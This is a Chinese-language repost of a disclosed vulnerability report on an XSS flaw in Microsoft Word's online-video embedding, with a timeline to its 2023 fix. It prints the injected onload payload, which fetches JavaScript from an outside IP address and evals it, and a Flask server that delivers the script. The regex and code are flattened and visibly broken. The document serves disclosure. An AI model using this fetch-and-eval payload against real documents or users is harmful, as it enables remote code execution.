概括
在服务器中,当从攻击者指定的链接解析视频时,视频标题中包含的恶意负载可以触发XSS(跨站脚本)攻击,从而允许执行任意Javascript代码。
基础
-
产品:Office Word,包括 Office 365 Word
-
测试版本:Microsoft Word for Microsoft 365 MSO(版本 2306 内部版本 16.0.16529.20164)64 位
-
Bug 类别:XSS(跨站脚本)
漏洞
包括 MS Word 在内的各种 Office 产品允许用户通过“在线视频”选项卡将所需的外部视频插入到文档中。
当用户播放嵌入在文档中的外部视频时,Office 会检查外部视频的提供商是否值得信赖,例如 YouTube。此检查是通过将以下正则表达式应用于 URL 来执行的。
https?://(www.)?youtube.w{2,3}/.*|https?://(www.)?youtube-nocookie.w{2,3}/.*|https?://youtu.be/.*|https?://(player.)?vimeo.com/.*|https?://(w+.)?slideshare.net/.*|https?://(w+.)?microsoftstream.com/.*如果它被认为是可信的,它会发送如下请求来获取视频标题或缩略图等数据。
GET https://hubble.officeapps.live.com/mediasvc/api/media/oembed?url=https%3A%2F%2Fwww.youtube.com%2Fembed%2FGX2nEmvxK-4%3Ffeature%3Doembed&streamsso=true&lcid=1033&syslcid=1042&uilcid=1033&app=0&ver=16&build=16.0.16529&platform=Win32 HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.16529; Pro)X-IDCRL_ACCEPTED: tX-Office-Version: 16.0.16529X-Office-Application: 0X-Office-Platform: Win32X-Office-AudienceGroup: ProductionX-Office-SessionId: DE75B69F-49BA-4D92-BD45-2B02504B4021Host: hubble.officeapps.live.com
hubble.officeapps.live.com上的服务器响应信息,包括视频的标题、描述和用于播放视频的 HTML iframe 标记。
该漏洞源自此 iframe 标记。服务器将视频的标题添加到iframe 标记的“ title”属性中,无需任何验证。因此,通过适当地使用双引号,我们可以自由地将onload属性添加到服务器响应的 iframe 标记中。
以下是officeapps.live.com服务器对恶意外部视频的响应示例。
{"description": "","video_description": "","start_time": null,"end_time": null,"embed_url": "https://www.youtube.com/embed/GX2nEmvxK-4?feature=oembed","html": "<iframe width="200" height="150" src="https://www.youtube.com/embed/GX2nEmvxK-4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen="" title="" onload="fetch('http://158.247.239.32/a.js').then(function(a){a.text().then(function(a){eval(a)})})" sandbox="allow-scripts allow-same-origin allow-popups"></iframe>","type": "video","title": "" onload="fetch('http://127.0.0.1/a.js').then(function(a){a.text().then(function(a){eval(a)})})","provider_name": "YouTube","provider_url": "https://www.youtube.com/","thumbnail_url": "https://i.ytimg.com/vi/GX2nEmvxK-4/hqdefault.jpg","thumbnail_width": 480.0,"thumbnail_height": 360.0,"width": 200.0,"height": 150.0}
根据此响应,Word 会在 %LOCALAPPDATA%MicrosoftWindowsINetCacheContent.Word 目录中写入要通过Edge Webview呈现的 HTML 文件。
结果,这个 HTML 将包含攻击者注入的 JS 代码。(此逻辑在 wwlib!XszCreateVideoHTML 中实现。对此的详细分析超出了本文的范围。)
如上所示,iframe 的沙箱属性设置了allow-scripts、allow-same-origin 和allow-popups。这意味着可以执行 JavaScript,可以通过 window.open 运行所需的 URI,或者可以通过 fetch 方法执行来自外部服务器的脚本。
开发
如漏洞描述中的示例所示,创建一个 YouTube 视频,其标题包含用于插入 onload 属性的有效负载。
" onload="fetch('[http://127.0.0.1/a.js](http://127.0.0.1/a.js)').then(function(a){a.text().then(function(a){eval(a)})})单击 Word 中的“在线视频”选项卡,然后将恶意视频的 URL 插入到文档中。
设置一个简单的 Web 服务器,允许 CORS 并使用恶意 JavaScript 进行响应,如下所示。(该示例通过计算器 URI 方案执行 calc.exe。)
from flask import Flaskapp = Flask(__name__)def apply_cors(response):response.headers['Access-Control-Allow-Origin'] = '*'return responsedef exploit():return 'window.open("calculator://")'if __name__ == '__main__':app.run(host='0.0.0.0', port=80)
演示
结论
该漏洞表明,攻击者可以创建包含特定视频的 Word 文档,并在播放视频时执行任意 javascript 代码。
Office 过去的关键漏洞,例如 CVE-2021-40444 和 CVE-2022-30190 (Folina),都是从执行任意 JavaScript 开始的。如果它与新的易受攻击的 URI 链接,例如之前被利用的 ms-msdt,则可能会直接导致严重的 RCE(远程代码执行)漏洞。
尤其是当播放Word中嵌入的视频时触发的漏洞,攻击者很容易诱导用户播放视频。需要立即采取行动。
参考
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190
时间线
2023-07-27 向 MSRC 报告漏洞
2023-08-25 被认定为安全漏洞,严重程度为“严重”
2023-09-12 已在最新版本中修复
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):2023 微软 Office XSS
